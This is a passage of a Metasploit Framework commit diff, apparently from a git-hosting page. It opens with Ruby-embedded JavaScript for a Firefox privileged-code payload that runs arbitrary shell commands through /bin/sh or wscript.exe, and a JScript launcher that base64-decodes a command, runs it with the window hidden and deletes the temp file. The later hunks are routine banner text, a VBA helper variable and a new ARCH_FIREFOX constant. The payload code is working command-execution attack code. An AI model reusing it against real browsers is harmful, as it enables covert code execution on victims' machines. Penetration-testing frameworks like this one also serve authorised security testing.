.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
jscriptFile.append('#{Rex::Text.rand_text_alphanumeric(8+rand(12))}.js');
var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
.createInstance(Components.interfaces.nsIFileOutputStream);
stream.init(jscriptFile, 0x04 \| 0x08 \| 0x20, 0666, 0);
stream.write(jscript, jscript.length);
if (stream instanceof Components.interfaces.nsISafeOutputStream) {
stream.finish();
} else {
stream.close();
}
}
var stdoutFile = "#{Rex::Text.rand_text_alphanumeric(8+rand(12))}";
var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
.getService(Components.interfaces.nsIProperties)
.get("TmpD", Components.interfaces.nsIFile);
stdout.append(stdoutFile);
if (windows) {
var shell = shPath+" "+cmd;
shell = shPath+" "+shell.replace(/\\W/g, shEsc)+" >"+stdout.path+" 2>&1";
var b64 = svcs.btoa(shell);
} else {
var shell = shPath+" "+cmd.replace(/\\W/g, shEsc);
shell = shPath+" "+shell.replace(/\\W/g, shEsc) + " >"+stdout.path+" 2>&1";
}
var process = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
var sh = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
if (windows) {
sh.initWithPath("C:\\\\Windows\\\\System32\\\\wscript.exe");
process.init(sh);
var args = [jscriptFile.path, b64];
process.run(true, args, args.length);
jscriptFile.remove(true);
setTimeout(function(){cb(false, cmd+"\\n"+readFile(stdout.path));});
} else {
sh.initWithPath("/bin/sh");
process.init(sh);
var args = ["-c", shell];
process.run(true, args, args.length);
setTimeout(function(){cb(false, readFile(stdout.path));});
}
};
|
end
# This file is dropped on the windows platforms to a temp file in order to prevent the
# cmd.exe prompt from appearing. It is executed and then deleted.
#
# @return [String] JScript that reads its command-line argument, decodes
# base64 and runs it as a shell command.
def jscript_launcher
%Q|
var b64 = WScript.arguments(0);
var dom = new ActiveXObject("MSXML2.DOMDocument.3.0");
var el = dom.createElement("root");
el.dataType = "bin.base64"; el.text = b64; dom.appendChild(el);
var stream = new ActiveXObject("ADODB.Stream");
stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);
stream.Position=0; stream.type=2; stream.CharSet = "us-ascii"; stream.Position=0;
var cmd = stream.ReadText();
(new ActiveXObject("WScript.Shell")).Run(cmd, 0, true);
|
end
end

15
lib/msf/ui/console/command_dispatcher/core.rb
View File

@ -397,15 +397,15 @@ class Core
banner << "\n\n"
end
banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr\n"
banner << " =[ %yelmetasploit v#{Msf::Framework::Version} [core:#{Msf::Framework::VersionCore} api:#{Msf::Framework::VersionAPI}]%clr ]\n"
banner << "+ -- --=[ "
banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post\n"
banner << "#{framework.stats.num_exploits} exploits - #{framework.stats.num_auxiliary} auxiliary - #{framework.stats.num_post} post ]\n"
banner << "+ -- --=[ "
oldwarn = nil
avdwarn = nil
banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops\n"
banner << "#{framework.stats.num_payloads} payloads - #{framework.stats.num_encoders} encoders - #{framework.stats.num_nops} nops ]\n"
if ( ::Msf::Framework::RepoRevision.to_i > 0 and ::Msf::Framework::RepoUpdatedDate)
tstamp = ::Msf::Framework::RepoUpdatedDate.strftime("%Y.%m.%d")
banner << " =[ svn r#{::Msf::Framework::RepoRevision} updated #{::Msf::Framework::RepoUpdatedDaysNote} (#{tstamp})\n"
@ -428,6 +428,15 @@ class Core
avdwarn << ""
end
# We're running a two week survey to gather feedback from users.
# Let's make sure we reach regular msfconsole users.
# TODO: Get rid of this sometime after 2014-01-23
survey_expires = Time.new(2014,"Jan",22,23,59,59,"-05:00")
if Time.now.to_i < survey_expires.to_i
banner << "+ -- --=[ Answer Q's about Metasploit and win a WiFi Pineapple Mk5 ]\n"
banner << "+ -- --=[ http://bit.ly/msfsurvey (Expires #{survey_expires.ctime}) ]\n"
end
# Display the banner
print_line(banner)

1
lib/msf/util/exe.rb
View File

@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
# Specify the payload in hex as an extra file..
payload_hex = exe.unpack('H*')[0]

50
lib/rex/constants.rb
View File

@ -64,29 +64,30 @@ LEV_3 = 3
#
# Architecture constants
#
ARCH_ANY = '_any_'
ARCH_X86 = 'x86'
ARCH_X86_64 = 'x86_64'
ARCH_X64 = 'x64' # To be used for compatability with ARCH_X86_64
ARCH_MIPS = 'mips'
ARCH_MIPSLE = 'mipsle'
ARCH_MIPSBE = 'mipsbe'
ARCH_PPC = 'ppc'
ARCH_PPC64 = 'ppc64'
ARCH_CBEA = 'cbea'
ARCH_CBEA64 = 'cbea64'
ARCH_SPARC = 'sparc'
ARCH_CMD = 'cmd'
ARCH_PHP = 'php'
ARCH_TTY = 'tty'
ARCH_ARMLE = 'armle'
ARCH_ARMBE = 'armbe'
ARCH_JAVA = 'java'
ARCH_RUBY = 'ruby'
ARCH_DALVIK = 'dalvik'
ARCH_PYTHON = 'python'
ARCH_NODEJS = 'nodejs'
ARCH_TYPES =
ARCH_ANY = '_any_'
ARCH_X86 = 'x86'
ARCH_X86_64 = 'x86_64'
ARCH_X64 = 'x64' # To be used for compatability with ARCH_X86_64
ARCH_MIPS = 'mips'
ARCH_MIPSLE = 'mipsle'
ARCH_MIPSBE = 'mipsbe'
ARCH_PPC = 'ppc'
ARCH_PPC64 = 'ppc64'
ARCH_CBEA = 'cbea'
ARCH_CBEA64 = 'cbea64'
ARCH_SPARC = 'sparc'
ARCH_CMD = 'cmd'
ARCH_PHP = 'php'
ARCH_TTY = 'tty'
ARCH_ARMLE = 'armle'
ARCH_ARMBE = 'armbe'
ARCH_JAVA = 'java'
ARCH_RUBY = 'ruby'
ARCH_DALVIK = 'dalvik'
ARCH_PYTHON = 'python'
ARCH_NODEJS = 'nodejs'
ARCH_FIREFOX = 'firefox'
ARCH_TYPES =
[
ARCH_X86,
ARCH_X86_64,
@ -107,7 +108,8 @@ ARCH_TYPES =
ARCH_RUBY,
ARCH_DALVIK,
ARCH_PYTHON,
ARCH_NODEJS
ARCH_NODEJS,
ARCH_FIREFOX
]
ARCH_ALL = ARCH_TYPES

Some files were not shown because too many files have changed in this diff Show More